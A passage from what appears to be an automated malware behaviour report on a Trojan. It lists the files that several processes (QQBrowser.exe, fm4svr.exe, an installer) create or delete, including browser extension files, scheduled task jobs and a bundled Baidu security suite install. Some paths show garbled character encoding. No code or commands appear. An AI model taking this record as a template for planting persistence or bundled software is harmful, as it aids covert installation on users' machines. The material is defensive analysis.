%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\logo.png (764 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\qzone-icon.png (495 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\toolbar_btn_Qzone_light1.png (435 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\share.html (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\manifest.json (980 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\js\json2.js (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\util.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\js\util.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\share.css (7 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\share3.html (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\share2.html (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\logo.png (764 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\toolbar_btn_Qzone_dark1.png (667 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\js\video_share.js (555 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\share-icon.png (337 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\share_transit-man140318113526.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\share3.html (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\video_share.js (555 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\qzone-icon.png (495 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\qzonelogin.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\play.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\js\qwest.js (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\toolbar_btn_new_Qzone.png (552 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\share_transit-man140318113526.png (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\share.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\msg.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\background.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\share-btn.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\share.css (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\text_share.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\app.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\share-icon.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\qzone.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\toolbar_btn_Qzone.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\close.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\image_share.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\json2.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\toolbar_btn_Qzone_dark1.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\popup.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\qwest.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1 (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\share2.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\toolbar_btn_Qzone_light1.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\qzone-icon.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\util.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\logo.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\share3.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\video_share.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\qzonelogin.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\play.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\toolbar_btn_new_Qzone.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\share_transit-man140318113526.png (0 bytes)

The process QQBrowser.exe:3860 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\QQBrowser Udpater Task(Core).job (280 bytes)
%WinDir%\Tasks\QQBrowser Udpater Task.job (276 bytes)

The process QQBrowser.exe:3164 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\dr_packet.dat (328 bytes)

The process QQBrowser.exe:2076 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\educate.html (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\educate.html (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\light.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\light.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\setup_start.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\setup_start.html (308 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\dark.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\dark.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1 (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\setup_start.html (308 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\manifest.json (698 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\setup_finish.html (654 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\setup_finish.html (654 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\setup_finish.png (5 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\setup_start.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\logo32.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\logo32.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{5FD65AEB-B895-446A-915D-72B6D4886A0E}\0.0.0.0\manifest.json (698 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\setup_finish.png (5 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\educate.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\light.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\setup_start.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\setup_start.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\dark.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1 (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\setup_finish.html (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\logo32.png (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{5FD65AEB-B895-446A-915D-72B6D4886A0E}_1\setup_finish.png (0 bytes)

The process QQBrowser.exe:3300 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\ClientUpdate\cliAA.tmp.qbl (10370 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\ClientUpdate\update.ini (64 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\ClientUpdate\cliAB.tmp.qbl (386 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\ClientUpdate\cliAA.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\ClientUpdate\cliAB.tmp (0 bytes)

The process fm4svr.exe:348 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qqtj1[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\qqtj2[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qqtj1[2].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\6d839722\DMSet.Xml (676 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\qqtj1[1].htm (0 bytes)

The process F0916_s_30911.exe:1112 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdBugRpt.exe (3361 bytes)
%WinDir%\Temp\Perflib_Perfdata_7a0.dat (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\hips.xml (17 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDCooly.dll (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVDownloadProtect.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayDldProtect.rdb (6360 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\ad.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMSkin.dll (37368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMEvents.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMPerfMon.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\KVInstallHelper.dll (12536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVMainFrame.dll (7345 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\res\InstallWnd.zip (12536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\bduf.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\wverify.dat (66168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\ieBaiduSDDetectPlug.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\iexplore.exe.xml (528 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVQuarantine.rdb (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\uninst.exe (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\jindutiao.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\PluginInstallHelper.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\SearchProtection.rdb (5064 bytes)
%WinDir%\Fonts (384 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMSDWrench.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVEng.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\810.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDLogicUtils.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastLogo.ico (2105 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\blacksign.dat (852 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\KavUpdate.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\npBaiduSDDetectPlug.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\delete.png (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BSRLib.dat (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\809.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdTray.exe (10815 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDAVCScan.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMTinyXml.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVVirusPlugins.dll (12024 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVWsc.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\NewPih.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\bduf.dll (11048 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\finish.png (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\monitor_config.dat (559 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Repair_PluginConfig.xml (411 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\806.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\bd0001.dll (5064 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKVMainFrame.dll (32128 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMAVCached.dll (11048 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\KVCommonRes.rdb (132004 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\change.png (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMFrameWork.dll (10136 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSkin.dll (8281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDDownLoadProtectPlugin.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (1596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDShellExt.dll (15168 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe (9605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDUDiskGuard.dll (8560 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\kav_verify.dat (677 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\hips.xml (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyA4.tmp (5533 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdvs.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\DriverManager.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\HIPS.dll (31856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDKitUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDCooly.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\Cooly_PluginConfig.xml (720 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDDownloader.exe (42222 bytes)
%WinDir% (480 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\cache_config.dat (469 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVLogs.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect.dll (673 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢\ÃƒÂ¥Ã‚ÂÃ‚Â¸ÃƒÂ¨Ã‚Â½Ã‚Â½ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦ÃƒÂ¦Ã‚ÂÃ¢â€šÂ¬ÃƒÂ¦Ã‚Â¯Ã¢â‚¬â„¢.lnk (944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA2.tmp\file\BDMRepBase.dll (27704 bytes)
